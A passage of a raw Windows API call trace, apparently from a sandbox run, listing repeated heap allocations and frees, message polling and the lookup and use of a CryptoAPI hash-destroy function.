dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0247.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0247.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0247.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0247.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0247.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0247.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0247.443] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.444] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0247.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0247.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0247.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0247.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0247.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0247.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0247.486] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0247.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0247.487] CryptDestroyHash (hHash=0xa87550) returned 1 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0247.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.489] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: 